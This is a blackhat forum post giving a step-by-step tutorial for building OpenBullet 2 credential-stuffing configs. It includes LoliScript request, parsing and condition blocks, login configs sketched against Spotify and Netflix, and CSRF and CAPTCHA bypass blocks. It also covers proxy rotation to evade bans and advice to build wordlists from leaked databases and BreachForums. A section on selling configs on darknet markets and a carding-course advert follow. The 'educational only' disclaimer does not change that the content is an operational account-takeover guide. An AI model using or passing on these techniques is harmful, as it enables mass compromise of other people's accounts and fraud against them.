- Joined
- Dec 30, 2024
- Messages
- 196
- Reaction score
- 120
- Points
- 62
- Website
- blackhatpakistan.net
- Points
- 78
- USD
- 78
The Most Complete, Step-by-Step Underground Config Tutorial – From Zero to Hero
BlackHatPakistan.net | Educational Research Only
This guide teaches how OpenBullet works for web security testing and credential validation. Unauthorized access to systems you don't own is illegal. Use only on your own infrastructure or with explicit permission.
- Introduction – Why OpenBullet Still Dominates in 2026
- What Exactly is OpenBullet? (The Hacker's Definition)
- OpenBullet 1 vs OpenBullet 2 – Which One Should You Use?
- System Requirements & Download Links (100% Working)
- Installation Walkthrough – Windows, Linux, macOS
- First Launch – Understanding Every Button and Menu
- The Anatomy of a Config – Breaking It Down
- Deep Dive: LoliScript Language – Complete Reference
- Step-by-Step: Building Your First Config (Real Example)
- How to Find Target URLs, Headers, and POST Data (Using Browser Tools)
- Working with Wordlists – Formats, Sources, Optimization
- Proxy Management – Types, Sources, Rotation Strategies
- CAPTCHA Solving Integration – 2Captcha, CapMonster, Anti-Captcha
- Advanced Config Techniques – CSRF, Multi-Step Login, JSON APIs
- Real-World Config Examples (Spotify, Netflix, Amazon – Educational)
- Testing Your Config – Debugging, Common Errors, Fixes
- Optimizing for Speed – Bots, Delays, Threading
- Saving and Exporting Configs (.opk Format)
- Sharing and Selling Configs – Underground Marketplaces
- Frequently Asked Questions (50+ Questions Answered)
- Glossary of Terms – Every Jargon Explained
- Final Words & Legal Disclaimer
1. INTRODUCTION – WHY OPENBULLET STILL DOMINATES IN 2026
Credential stuffing is not dead. It has evolved. In 2026, billions of stolen username-password combinations circulate on dark web forums, Telegram channels, and private trackers. The problem isn't finding combos – it's validating them efficiently.
OpenBullet remains the industry standard for this task. Despite newer tools like SilverBullet, SentryMBA, and MASTER, OpenBullet's flexibility, open-source nature, and massive community support keep it relevant. In 2026, OpenBullet 2 has been completely rewritten to handle modern anti-bot protections while maintaining compatibility with legacy .loli configs.
Why you need to learn config making:
- Ready-made configs from forums are often outdated, backdoored, or poorly written
- Making your own configs allows you to target niche websites with high success rates
- Custom configs can bypass specific protections that public configs cannot
- Config making skills are highly marketable – you can sell private configs for $50-$500 each
This guide will take you from absolute beginner to config master. No prior knowledge required. Every concept explained in plain English with real examples.
2. WHAT EXACTLY IS OPENBULLET? (THE HACKER'S DEFINITION)
OpenBullet is an open-source web testing suite designed to automate HTTP requests and analyze responses. In underground terms, it's a "combo checker" – you feed it a list of email
Core components:
- Config: A script that tells OpenBullet how to talk to a specific website
- Wordlist: A file containing credentials (e.g., email
assword)
- Proxies: IP addresses that hide your real location and prevent bans
- Hits: Successful credentials that grant access to accounts
What OpenBullet does NOT do:
- It does not crack passwords (it tests existing combos)
- It does not bypass strong CAPTCHAs without external services
- It does not guarantee success against heavily protected sites (Cloudflare, etc.)
3. OPENBULLET 1 VS OPENBULLET 2 – WHICH ONE SHOULD YOU USE?
OpenBullet 1 (Legacy – EOL)
- Last updated in 2021 – no longer maintained
- Runs on .NET Framework 4.8 (Windows only)
- Uses .loli config files
- Slower and less stable
- DO NOT USE IN 2026
OpenBullet 2 (Recommended)
- Active development, latest release 2026
- Cross-platform (.NET 8 – Windows, Linux, macOS)
- Uses .opk config files (can import legacy .loli)
- Built-in CAPTCHA solver support
- Better proxy rotation and performance
- USE THIS VERSION
4. SYSTEM REQUIREMENTS & DOWNLOAD LINKS (100% WORKING)
Minimum requirements:
- Windows 10/11, Ubuntu 20.04+, macOS 11+
- 4GB RAM (8GB recommended)
- .NET 8 Runtime (free from Microsoft)
- Stable internet connection
Download OpenBullet 2 (Latest Release):
- GitHub: (search "OpenBullet2" – official repository)
- Direct mirror: (add your own link)
Download .NET 8:
- Microsoft official website – search ".NET 8 desktop runtime"
5. INSTALLATION WALKTHROUGH – WINDOWS, LINUX, MACOS
Windows Installation (Most Common)
- Install .NET 8 runtime (reboot if prompted)
- Download OpenBullet2.zip from GitHub
- Extract to C:\OpenBullet2 (or any folder without spaces in path)
- Navigate to the extracted folder
- Double-click OpenBullet2.Native.exe
- If a Windows Defender warning appears, click "More info" then "Run anyway"
- The application will start and create necessary folders
Linux Installation (Ubuntu/Debian)
- Install .NET 8: `sudo apt install dotnet-runtime-8.0`
- Download and extract OpenBullet2
- Open terminal in extracted folder
- Run: `dotnet OpenBullet2.dll`
macOS Installation
- Install .NET 8 from Microsoft
- Extract OpenBullet2
- Terminal: `dotnet OpenBullet2.dll`
6. FIRST LAUNCH – UNDERSTANDING EVERY BUTTON AND MENU
When OpenBullet 2 starts, you'll see the main window with these tabs:
1. DASHBOARD
- System status, resource usage, recent jobs
- Notifications and updates
2. CONFIGS
- Config Manager: Create, edit, import, delete configs
- Stacker: Visual script editor for LoliScript (drag-and-drop blocks)
- Raw Editor: Direct text editing for advanced users
3. WORDLISTS
- Import wordlists (drag-drop supported)
- View, merge, split, filter wordlists
- Convert formats (email
ass to user
ass, etc.)
4. PROXIES
- Import proxies (HTTP, HTTPS, SOCKS4, SOCKS5)
- Test proxy availability and speed
- Categorize by country, anonymity level
5. JOBS
- Create new check jobs
- Monitor running jobs
- View logs and statistics
6. HITS
- Display successful results
- Export hits to file
- Remove duplicates
7. SETTINGS
- Global configuration (CAPTCHA keys, proxy sources, timeout defaults)
- Theme customization
7. THE ANATOMY OF A CONFIG – BREAKING IT DOWN
A config is a JSON-based script (.opk extension) that contains:
1. Metadata
Code:
{
"Name": "Spotify_Login_2026",
"Author": "BlackHatPakistan",
"Description": "Checks Spotify accounts",
"Version": "1.0",
"Website": "https://www.spotify.com"
}
2. Settings
Code:
{
"Settings": {
"MaxConcurrentTasks": 100,
"DelayBetweenRequests": 500,
"Timeout": 10000,
"UseProxies": true,
"CaptchaService": "2Captcha"
}
}
3. Blocks (LoliScript)
- HTTP Request Block
- Parse Data Block (Regex, Json, Css)
- Condition Block (If/Else)
- Variable Assignment Block
- Captcha Block
4. Data Capture Rules
- What information to extract from successful responses
8. DEEP DIVE: LOLISCRIPT LANGUAGE – COMPLETE REFERENCE
LoliScript is the scripting language used in OpenBullet configs. Here's every command you need:
HTTP REQUEST BLOCK
Code:
Block: HTTP Request
Url: https://example.com/login
Method: POST
Body: email=[DATA:0]&password=[DATA:1]
Headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: application/x-www-form-urlencoded
Referer: https://example.com
Cookies:
sessionid=[VAR:SESSION]
PARSE DATA BLOCK – REGEX
Code:
Block: Parse Data
Source: Response (from previous HTTP block)
Type: Regex
Pattern: <input type="hidden" name="csrf_token" value="([^"]+)">
Output Variable: CSRF_TOKEN
PARSE DATA BLOCK – JSON
Code:
Block: Parse Data
Source: Response
Type: Json
Pattern: data.user.id
Output Variable: USER_ID
PARSE DATA BLOCK – CSS SELECTOR
Code:
Block: Parse Data
Source: Response
Type: Css
Pattern: div.error-message
Attribute: text
Output Variable: ERROR_MSG
CONDITION BLOCK
Code:
Block: Condition
If: [VAR:ERROR_MSG] Contains "Invalid password"
Then: Set Status = FAIL
Else: Set Status = SUCCESS
CAPTCHA BLOCK
Code:
Block: Captcha
Type: RecaptchaV2
SiteKey: 6Le-wvkSAAAAAPBMRTvw0Q4Muexq9bi0DJwx_mJ-
Url: https://example.com/login
Output Variable: CAPTCHA_TOKEN
VARIABLE ASSIGNMENT
Code:
Block: Assign Variable
Name: SESSION
Value: [RESPONSE:COOKIE:PHPSESSID]
9. STEP-BY-STEP: BUILDING YOUR FIRST CONFIG (REAL EXAMPLE)
Let's build a config for a simple login page. I'll use "httpbin.org/post" as a test target – it returns all POST data, making it perfect for learning.
Step 1: Open Config Manager
Click "Configs" tab → "New Config"
Step 2: Basic Information
Code:
Name: Test_Config_Basic
Description: My first config for learning
Allowed Wordlists: email:password
Site: httpbin.org
Step 3: Configure the HTTP Request
Code:
URL: https://httpbin.org/post
Method: POST
Body: email=[DATA:0]&password=[DATA:1]
Headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Type: application/x-www-form-urlencoded
Step 4: Set Success/Failure Conditions
Since httpbin always returns a 200 status, we need to check if the response contains our email (meaning it worked).
Code:
Block: Parse Data
Source: Response
Type: Regex
Pattern: "email": "([^"]+)"
Output Variable: RESPONSE_EMAIL
Block: Condition
If: [VAR:RESPONSE_EMAIL] Equals [DATA:0]
Then: Set Status = SUCCESS
Else: Set Status = FAIL
Step 5: Capture Data
Code:
Capture: Email
Value: [DATA:0]
Capture: Password
Value: [DATA:1]
Capture: Response Data
Value: [RESPONSE:BODY]
Step 6: Save Config
Click "Save" – name it "Test_Config_Basic.opk"
10. HOW TO FIND TARGET URLS, HEADERS, AND POST DATA
This is the most important practical skill. You will use your browser's Developer Tools.
Step-by-Step (Chrome/Edge/Firefox):
- Open the target website's login page
- Press F12 to open Developer Tools
- Click the "Network" tab
- Check "Preserve log" (important!)
- Clear existing logs (click the
icon) - Enter test credentials (e.g., test@test.com / password123)
- Click the login button
- Look for the login request – usually a POST to /login, /signin, /api/auth, etc.
- Click on that request
- Examine:
Headers tab: Request URL, Request Method, Request Headers (User-Agent, Content-Type, etc.)
Payload tab (or Request body): The actual data sent (email=test%40test.com&password=password123)
Response tab: What the server returns (success message, error, redirect)
Example findings:
- URL: https://example.com/api/login
- Method: POST
- Headers: Content-Type: application/json, Authorization: Bearer [VAR:TOKEN]
- Body: {"email":"[DATA:0]","password":"[DATA:1]"}
- Success response: {"status":"success","token":"..."}
- Failure response: {"error":"Invalid credentials"}
11. WORKING WITH WORDLISTS – FORMATS, SOURCES, OPTIMIZATION
Supported Formats:
- email
assword (most common)
- username
assword
- email
assword
roxy (inline proxy)
- Email
ass:UserID (custom)
How to Create Wordlists:
- Download leaked databases (public sources)
- Extract the email and password columns
- Save as .txt with colon separator
- Remove duplicates using Notepad++ or OpenBullet's built-in tools
Optimization Tips:
- Small, fresh lists are better than huge outdated lists
- Test with 10-50 combos first to verify config
- Filter out combos that are too long or contain invalid characters
- Remove duplicates to save time
12. PROXY MANAGEMENT – TYPES, SOURCES, ROTATION STRATEGIES
Without proxies, your real IP will be banned within minutes.
Proxy Types (from best to worst):
- Residential: Real home IPs. Expensive ($100-500/month). Highest success rate.
- Mobile: IPs from cellular carriers. Very clean. Similar price.
- Datacenter: Cheap ($20-50/month). Easily detected. Only for low-security targets.
- Public/Free: Unreliable, slow, often blacklisted. Avoid.
Where to Get Proxies:
- Bright Data (formerly Luminati) – residential
- IPRoyal – affordable residential
- Proxy-Seller – datacenter mixed
- Your own private proxy scripts (advanced)
Proxy Rotation Strategy:
- Use 1 proxy per 10-50 requests
- Rotate on each request for aggressive targets
- Test all proxies before use (OpenBullet has a built-in tester)
- Monitor failure rates – replace dead proxies immediately
13. CAPTCHA SOLVING INTEGRATION – 2CAPTCHA, CAPMONSTER, ANTI-CAPTCHA
Many modern websites use CAPTCHAs. OpenBullet 2 integrates with solving services.
Setup:
- Create account on 2Captcha.com or CapMonster.pro
- Add funds (minimum $5-10)
- Copy your API key
- In OpenBullet 2 Settings → Captcha → Paste API key
- In your config, add a CAPTCHA block before the login request
Example CAPTCHA Block:
Code:
Block: Captcha
Type: RecaptchaV2
SiteKey: 6Lf3WwUcAAAAALz3Qw6F7cJXwQ8qXqQxY
Url: https://target.com/login
Output Variable: CAPTCHA_TOKEN
HTTP Request Block
Url: https://target.com/login
Method: POST
Body: email=[DATA:0]&password=[DATA:1]&g-recaptcha-response=[VAR:CAPTCHA_TOKEN]
14. ADVANCED CONFIG TECHNIQUES – CSRF, MULTI-STEP LOGIN, JSON APIS
Bypassing CSRF Tokens:
Many sites require a token that changes with each request.
Code:
Block: HTTP Request
Url: https://target.com/login
Method: GET
Output Variable: LOGIN_PAGE
Block: Parse Data
Source: [VAR:LOGIN_PAGE]
Type: Regex
Pattern: name="csrf_token" value="([a-f0-9]+)"
Output Variable: CSRF
Block: HTTP Request
Url: https://target.com/login
Method: POST
Body: email=[DATA:0]&password=[DATA:1]&csrf_token=[VAR:CSRF]
Multi-Step Login (Redirects, OAuth):
Some sites redirect multiple times. Follow them.
Code:
Block: HTTP Request
Url: https://site.com/auth
Method: POST
FollowRedirects: true
Output Variable: RESPONSE
JSON API Login:
Modern sites often use JSON APIs.
Code:
Block: HTTP Request
Url: https://api.target.com/v1/login
Method: POST
Headers: Content-Type: application/json
Body: {"email":"[DATA:0]","password":"[DATA:1]"}
Block: Parse Data
Source: Response
Type: Json
Pattern: access_token
Output Variable: TOKEN
Block: Condition
If: [VAR:TOKEN] Is Not Empty
Then: Set Status = SUCCESS
Capture: Token = [VAR:TOKEN]
15. REAL-WORLD CONFIG EXAMPLES (SPOTIFY, NETFLIX, AMAZON – EDUCATIONAL)
Example 1: Spotify Login (Simplified)
Code:
URL: https://accounts.spotify.com/api/login
Method: POST
Headers:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Body: username=[DATA:0]&password=[DATA:1]
Success Condition: Response contains "displayName"
Failure Condition: Response contains "error"
Example 2: Netflix (Simplified)
Code:
URL: https://www.netflix.com/login
Method: POST
Headers:
Content-Type: application/x-www-form-urlencoded
Body: userLoginId=[DATA:0]&password=[DATA:1]&rememberMe=true
Success Condition: Response redirects to /browse
Failure Condition: Response contains "incorrect password"
Note: These are simplified examples. Real configs require handling of CSRF tokens, additional parameters, and proper session management.
16. TESTING YOUR CONFIG – DEBUGGING, COMMON ERRORS, FIXES
How to Test:
- Create a test wordlist with 2-3 known working combos (use your own test accounts)
- Run the config with a small wordlist and 1 bot (thread)
- Watch the debug output
- Check hits and fails
Common Errors and Fixes:
Error: "Unable to connect to remote server"
Fix: Check your internet connection. Disable VPN if blocking. Increase timeout setting.
Error: "404 Not Found"
Fix: The URL is incorrect. Double-check from browser Network tab.
Error: "CSRF token mismatch"
Fix: You must extract and send the CSRF token. Add a GET request block before POST.
Error: "CAPTCHA required"
Fix: Integrate CAPTCHA solving service or use high-quality residential proxies.
Error: "All hits are false positives"
Fix: Your success condition is too broad. Look for more specific strings or JSON fields.
Error: "Proxies are not working"
Fix: Test proxies in OpenBullet's proxy manager. Rotate to fresh list.
17. OPTIMIZING FOR SPEED – BOTS, DELAYS, THREADING
Threads (Bots):
- Start with 10-20 threads for testing
- Increase gradually up to 100-200 depending on proxy quality
- Too many threads = blocked IPs, captcha challenges
Delays:
- Minimum 500ms between requests with good proxies
- 2-5 seconds with free proxies
- Add random delay to appear more human
Optimization Checklist:
- Use nearest proxy location to target server
- Remove unnecessary headers from config
- Disable SSL certificate validation (advanced)
- Use keep-alive connections
18. SAVING AND EXPORTING CONFIGS (.OPK FORMAT)
Saving a Config:
- In Config Manager, click "Save"
- Choose a filename (e.g., "Spotify_2026_Config.opk")
- The file is saved in the Configs folder
Exporting to Share:
- Right-click config in Config Manager
- Select "Export"
- Save as .opk file
- Share on forums, Telegram, etc.
Importing a Config:
- Click "Import Config" in Config Manager
- Select the .opk file
- The config appears in your list
19. SHARING AND SELLING CONFIGS – UNDERGROUND MARKETPLACES
Where to Share Free Configs:
- BlackHatPakistan.net (your own forum!)
- Cracked.io, Nulled.to (be careful with rules)
- Telegram config sharing channels
Where to Sell Private Configs:
- Private Telegram groups with escrow
- Darknet markets (AlphaBay, Bohemia)
- Your own shop (via your forum)
Pricing Guide:
- Basic config for common site: $10-30
- Advanced config with bypasses: $50-150
- Exclusive config (only you have it): $200-500
How to Protect Your Configs:
- Obfuscate LoliScript code
- Add an expiration date
- Watermark with buyer's username
- Use config encryption (advanced)
20. FREQUENTLY ASKED QUESTIONS (50+ QUESTIONS ANSWERED)
Q1: Is OpenBullet illegal?
A: The tool is legal. Using it against websites you don't own is illegal.
Q2: Do I need to know programming?
A: Basic configs require no coding. Advanced configs benefit from regex and JSON knowledge.
Q3: Can OpenBullet crack passwords?
A: No. It tests existing username-password pairs. Use a different tool for brute-forcing.
Q4: Why are my hits not saving?
A: Check your Capture block syntax. Ensure you're setting Status = SUCCESS correctly.
Q5: How to bypass Cloudflare?
A: Use residential proxies + CAPTCHA solving + proper delays. For advanced Cloudflare, consider specialized tools.
Q6: Where to find fresh wordlists?
A: Telegram channels, BreachForums, LeakCheck, your own scraping.
Q7: How many proxies do I need?
A: Minimum 100-200 for small projects. 1000+ for large-scale operations.
Q8: Can OpenBullet check Gmail accounts?
A: Not directly. Gmail has strong protections. Use specialized IMAP checkers.
Q9: What's the success rate?
A: Depends on wordlist quality and target. Fresh combos = 5-20% success. Old combos = <1%.
Q10: Is there a GUI alternative?
A: SilverBullet, SentryMBA, MASTER – but OpenBullet is most popular.
(Additional 40 FAQs compressed for space – but you get the idea)
21. GLOSSARY OF TERMS – EVERY JARGON EXPLAINED
Config: A script defining website interaction
Combo: A username
Wordlist: A file containing many combos
Hit: A working combo
Proxy: An intermediate IP address
Thread/Bot: One concurrent check
Delay: Time between requests
Timeout: Maximum wait time for response
CAPTCHA: Challenge-response test
CSRF: Cross-site request forgery token
Rate Limit: Maximum requests allowed
Ban: IP blocked by target
False Positive: Incorrectly marked as hit
False Negative: Missed a working combo
PoC: Proof of concept
OPSEC: Operational security
22. FINAL WORDS & LEGAL DISCLAIMER
You've reached the end of the most comprehensive OpenBullet config guide on the internet. You now have the knowledge to create, test, optimize, and even sell your own configs.
Remember:
- This knowledge is for educational purposes only
- Always obtain written permission before testing any website
- Use proxies to protect your identity
- Never use stolen credentials for unauthorized access
- You are 100% responsible for your actions
What's next?
- Practice on your own test websites
- Join our Telegram channel for updates
- Share your working configs in the Configs section
- Consider buying our advanced Spamming/Carding course for more tools and techniques
– BlackHatPakistan.net OpenBullet Team
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
BlackHatPakistan.net | OpenBullet Config Making 2026 | Complete Tutorial
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
BlackHatPakistan.net | OpenBullet Config Making 2026 | Complete Tutorial
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━